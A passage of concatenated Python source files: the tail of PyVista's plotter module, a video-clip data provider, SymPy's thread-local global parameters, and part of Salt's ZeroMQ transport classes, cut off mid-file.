>>> plotter.show() # doctest:+SKIP
"""
# verify no render exists
if self._background_renderers[self._active_renderer_index] is not None:
raise RuntimeError('A background image already exists. '
'Remove it with remove_background_image '
'before adding one')
# Need to change the number of layers to support an additional
# background layer
self.ren_win.SetNumberOfLayers(2)
if as_global:
for renderer in self.renderers:
renderer.SetLayer(1)
view_port = None
else:
self.renderer.SetLayer(1)
view_port = self.renderer.GetViewport()
renderer = BackgroundRenderer(self, image_path, scale, view_port)
self.ren_win.AddRenderer(renderer)
self._background_renderers[self._active_renderer_index] = renderer
# setup autoscaling of the image
if auto_resize and hasattr(self, 'iren'): # pragma: no cover
self._add_observer('ModifiedEvent', renderer.resize)
def remove_background_image(self):
"""Remove the background image from the current subplot."""
renderer = self._background_renderers[self._active_renderer_index]
if renderer is None:
raise RuntimeError('No background image to remove at this subplot')
renderer.deep_clean()
self._background_renderers[self._active_renderer_index] = None
class Plotter(BasePlotter):
"""Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render window.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smothing
point_smoothing : bool
If True, enable point smothing
polygon_smoothing : bool
If True, enable polygon smothing
"""
last_update_time = 0.0
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
splitting_position=splitting_position,
title=title)
log.debug('Initializing')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
self.__prior_window_size = window_size
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self._observers = {} # Map of events to observers of self.iren
self._add_observer("KeyPressEvent", self.key_press_event)
self.update_style()
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
self._add_observer(vtk.vtkCommand.TimerEvent, on_timer)
if rcParams["depth_peeling"]["enabled"]:
if self.enable_depth_peeling():
for renderer in self.renderers:
renderer.enable_depth_peeling()
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Display the plotting window.
Notes
-----
Please use the ``q``-key to close the plotter as some operating systems
(namely Windows) will experience issues saving a screenshot if the
exit button in the GUI is prressed.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits plotting session when user
closes the window when interactive is True.
interactive_update: bool, optional
Disabled by default. Allows user to non-blocking draw,
user should call Update() in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
# reset unless camera for the first render unless camera is set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
# if full_screen:
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
self.update() # For Windows issues. Resolves #186
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn("`auto_close` ignored: by clicking the exit button, you have destroyed the render window and we have to close it out.")
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support mult-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1, 1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
|
data.py
|
import os
import cv2
import random
import tempfile
import numpy as np
from Queue import Queue
from threading import Thread
from .base_provider import VideosDataset, DataProvider
class Data(VideosDataset):
def __init__(self, name, paths, normalization, sequence_length,
crop_size, num_classes, queue_size):
"""
Args:
name: str, name of the data (train, test or validation)
paths: list, list of string that have the video path and label
information
sequence_length: video clip length
crop_size: `tuple`, image resize size (width, height)
normalization: `str` or None
None: no any normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
num_classes: `integer`, number of classes that the dataset has
queue_size: `integer`, data queue size
"""
self.name = name
self.paths = paths
self.normalization = normalization
self.sequence_length = sequence_length
self.crop_size = crop_size
self.num_classes = num_classes
self.queue = DataQueue(name, queue_size)
self.examples = None
self._start_data_thread()
def get_frames_data(self, filename, num_frames_per_clip=16):
''' Given a directory containing extracted frames, return a video clip of
(num_frames_per_clip) consecutive frames as a list of np arrays
Args
num_frames_per_clip: sequence_length of the video clip
Returns
video: numpy, video clip with shape
[sequence_length, height, width, channels]
'''
video = []
s_index = 0
for parent, dirnames, files in os.walk(filename):
filenames = [ fi for fi in files if fi.endswith((".png", ".jpg", "jpeg")) ]
if(len(filenames) < num_frames_per_clip):
return None
suffix = filenames[0].split('.', 1)[1]
filenames_int = [i.split('.', 1)[0] for i in filenames]
filenames_int = sorted(filenames_int)
s_index = random.randint(0, len(filenames) - num_frames_per_clip)
for i in range(s_index, s_index + num_frames_per_clip):
image_name = str(filename) + '/' + str(filenames_int[i]) + '.' + suffix
# print image_name
img = cv2.imread(image_name)
img = cv2.resize(img, self.crop_size)
if self.normalization:
img_data = self.normalize_image(img, self.normalization)
video.append(img_data)
return video
def extract_video_data(self):
''' Single tread to extract video and label information from the dataset
'''
# Generate one randome index and
while True:
index = random.randint(0, len(self.paths)-1)
video_path, label = self.paths[index].strip('\n').split()
video = self.get_frames_data(video_path, self.sequence_length)
if video is not None and len(video) == self.sequence_length:
# Put the video into the queue
video = np.array(video)
label = np.array(int(label))
self.queue.put((video, label))
def _start_data_thread(self):
print("Start thread: %s data preparation ..." % self.name)
self.worker = Thread(target=self.extract_video_data)
self.worker.setDaemon(True)
self.worker.start()
@property
def num_examples(self):
if not self.examples:
# calculate the number of examples
total = 0
for line in self.paths:
video_path, _ = line.strip('\n').split()
for root, dirs, files in os.walk(video_path):
total += len(files)
self.examples = total / self.sequence_length
return self.examples
def next_batch(self, batch_size):
''' Get the next batches of the dataset
Args
batch_size: video batch size
Returns
videos: numpy, shape
[batch_size, sequence_length, height, width, channels]
labels: numpy
[batch_size, num_classes]
'''
videos, labels = self.queue.get(batch_size)
videos = np.array(videos)
labels = np.array(labels)
labels = self.labels_to_one_hot(labels, self.num_classes)
return videos, labels
class DataQueue():
def __init__(self, name, maximum_item, block=True):
"""
Args
name: str, data type name (train, validation or test)
maximum_item: integer, maximum item that this queue can store
block: boolean, block the put or get information if the queue is
full or empty
"""
self.name = name
self.block = block
self.maximum_item = maximum_item
self.queue = Queue(maximum_item)
@property
def queue(self):
return self.queue
@property
def name(self):
return self.name
def put(self, data):
self.queue.put(data, self.block)
def get(self, batch_size):
'''
Args:
batch_size: integer, the number of the item you want to get from the queue
Returns:
videos: list, list of numpy data with shape
[sequence_length, height, width, channels]
labels: list, list of integer number
'''
videos = []
labels = []
for i in range(batch_size):
video, label = self.queue.get(self.block)
videos.append(video)
labels.append(label)
return videos, labels
class DataProvider(DataProvider):
def __init__(self, path, num_classes, validation_set=None, test=False,
validation_split=None, normalization=None, crop_size=(64,64),
sequence_length=16, train_queue=None, valid_queue=None,
test_queue=None, train=False, queue_size=300, **kwargs):
"""
Args:
num_classes: the number of the classes
validation_set: `bool`.
validation_split: `int` or None
float: chunk of `train set` will be marked as `validation set`.
None: if 'validation set' == True, `validation set` will be
copy of `test set`
normalization: `str` or None
None: no any normalization
divide_255: divide all pixels by 255
divide_256: divide all pixels by 256
sequence_length: `integer`, video clip length
crop_size: `tuple`, the size that you want to reshape the images, (width, height)
train: `boolean`, whether we need the training queue or not
test: `test`, whether we need the testing queue or not
queue_size: `integer`, data queue size , default is 300
"""
self._path = path
self._num_classes = num_classes
self._sequence_length = sequence_length
self._crop_size = crop_size
train_videos_labels = self.get_videos_labels_lines(
os.path.join(self._path, 'train.list'))
test_videos_labels = self.get_videos_labels_lines(
os.path.join(self._path, 'test.list'))
if validation_set and validation_split:
random.shuffle(train_videos_labels)
valid_videos_labels = train_videos_labels[:validation_split]
train_videos_labels = train_videos_labels[validation_split:]
self.validation = Data('validation', valid_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if train:
self.train = Data('train', train_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if test:
self.test = Data('test', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
if validation_set and not validation_split:
self.validation = Data('validation', test_videos_labels,
normalization, sequence_length,
crop_size, num_classes, queue_size)
def get_videos_labels_lines(self, path):
# Open the file according to the filename
lines = open(path, 'r')
lines = list(lines)
new_lines = [os.path.join(self._path, line) for line in lines]
return new_lines
@property
def data_shape(self):
return (self._sequence_length, self._crop_size[1], self._crop_size[0], 3)
@property
def n_classes(self):
return self._num_classes
|
parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class generates thread-local container for SymPy's global parameters.
Every global parameters must be passed as keyword argument when generating
its instance.
A variable, `global_parameters` is provided as default instance for this class.
WARNING! Although the global parameters are thread-local, SymPy's cache is not
by now.
This may lead to undesired result in multi-threading operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True, exp_is_pow=False)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
Explanation
===========
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import evaluate
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
Explanation
===========
This context manager controls whether or not Mul distribute Number over
Add. Plan is to avoid distributing Number over Add in all of sympy. Once
that is done, this contextmanager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
@contextmanager
def _exp_is_pow(x):
"""
Control whether `e^x` should be represented as ``exp(x)`` or a ``Pow(E, x)``.
Examples
========
>>> from sympy import exp
>>> from sympy.abc import x
>>> from sympy.core.parameters import _exp_is_pow
>>> with _exp_is_pow(True): print(type(exp(x)))
<class 'sympy.core.power.Pow'>
>>> with _exp_is_pow(False): print(type(exp(x)))
exp
"""
old = global_parameters.exp_is_pow
clear_cache()
try:
global_parameters.exp_is_pow = x
yield
finally:
clear_cache()
global_parameters.exp_is_pow = old
|
zeromq.py
|
"""
Zeromq transport classes
"""
import copy
import errno
import hashlib
import logging
import os
import signal
import sys
import threading
import weakref
from random import randint
import salt.auth
import salt.crypt
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.log.setup
import salt.payload
import salt.transport.client
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.versions
import salt.utils.zeromq
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
from salt._compat import ipaddress
from salt.exceptions import SaltException, SaltReqTimeoutError
from salt.utils.zeromq import LIBZMQ_VERSION_INFO, ZMQ_VERSION_INFO, zmq
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP # nosec
log = logging.getLogger(__name__)
def _get_master_uri(master_ip, master_port, source_ip=None, source_port=None):
"""
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
Source: http://api.zeromq.org/4-1:zmq-tcp
"""
from salt.utils.zeromq import ip_bracket
master_uri = "tcp://{master_ip}:{master_port}".format(
master_ip=ip_bracket(master_ip), master_port=master_port
)
if source_ip or source_port:
if LIBZMQ_VERSION_INFO >= (4, 1, 6) and ZMQ_VERSION_INFO >= (16, 0, 1):
# The source:port syntax for ZeroMQ has been added in libzmq 4.1.6
# which is included in the pyzmq wheels starting with 16.0.1.
if source_ip and source_port:
master_uri = (
"tcp://{source_ip}:{source_port};{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
)
elif source_ip and not source_port:
master_uri = "tcp://{source_ip}:0;{master_ip}:{master_port}".format(
source_ip=ip_bracket(source_ip),
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
elif source_port and not source_ip:
ip_any = (
"0.0.0.0"
if ipaddress.ip_address(master_ip).version == 4
else ip_bracket("::")
)
master_uri = (
"tcp://{ip_any}:{source_port};{master_ip}:{master_port}".format(
ip_any=ip_any,
source_port=source_port,
master_ip=ip_bracket(master_ip),
master_port=master_port,
)
)
else:
log.warning(
"Unable to connect to the Master using a specific source IP / port"
)
log.warning("Consider upgrading to pyzmq >= 16.0.1 and libzmq >= 4.1.6")
log.warning(
"Specific source IP / port for connecting to master returner port:"
" configuraion ignored"
)
return master_uri
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_do_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop")
if io_loop is None:
io_loop = salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncZeroMQReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
log.trace(
"Inserted key into loop_instance_map id %s for key %s and process %s",
id(loop_instance_map),
key,
os.getpid(),
)
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncZeroMQReqChannel for %s", key)
return obj
def __deepcopy__(self, memo):
cls = self.__class__
# pylint: disable=too-many-function-args
result = cls.__new__(cls, copy.deepcopy(self.opts, memo))
# pylint: enable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ("_io_loop", "_refcount", "_refcount_lock"):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == "message_client":
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(
result,
key,
AsyncReqMessageClientPool(
result.opts,
args=(
result.opts,
self.master_uri,
),
kwargs={"io_loop": self._io_loop},
),
)
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
ZMQ can hang on quit if left to deconstruct on its own.
This because is deconstructs out of order.
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
@classmethod
def __key(cls, opts, **kwargs):
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
kwargs.get("master_uri", opts.get("master_uri")), # master ID
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = "zeromq"
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
if "master_uri" in kwargs:
self.opts["master_uri"] = kwargs["master_uri"]
self._io_loop = kwargs.get("io_loop")
if self._io_loop is None:
self._io_loop = salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
log.debug(
"Connecting the Minion to the Master URI (for the return server): %s",
self.master_uri,
)
self.message_client = AsyncReqMessageClientPool(
self.opts,
args=(
self.opts,
self.master_uri,
),
kwargs={"io_loop": self._io_loop},
)
self._closing = False
def close(self):
"""
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
"""
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
if hasattr(self, "message_client"):
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self._io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self._io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self._io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
@property
def master_uri(self):
if "master_uri" in self.opts:
return self.opts["master_uri"]
# if by chance master_uri is not there..
if "master_ip" in self.opts:
return _get_master_uri(
self.opts["master_ip"],
self.opts["master_port"],
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_ret_port"),
)
# if we've reached here something is very abnormal
raise SaltException("ReqChannel: missing master_uri/master_ip in self.opts")
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
# Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
if "key" not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
"""
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
"""
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
"""
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(
load, tries=tries, timeout=timeout, raw=raw
)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
"""
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
"""
async_methods = [
"connect",
"_decode_messages",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.ttype = "zeromq"
self.io_loop = kwargs.get("io_loop")
self._closing = False
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(
salt.utils.stringutils.to_bytes(self.opts["id"])
).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts["zmq_filtering"]:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast")
if self.opts.get("__role") == "syndic":
self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic")
else:
self._socket.setsockopt(
zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b"")
self._socket.setsockopt(
zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"])
)
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, "TCP_KEEPALIVE"):
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
recon_delay = self.opts["recon_default"]
if self.opts["recon_randomize"]:
recon_delay = randint(
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
)
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
recon_delay,
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts["recon_default"] + self.opts["recon_max"],
)
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"])
if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr(
zmq, "IPV4ONLY"
):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if self._closing is True:
return
self._closing = True
if hasattr(self, "_monitor") and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, "_stream"):
self._stream.close(0)
elif hasattr(self, "_socket"):
self._socket.close(0)
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
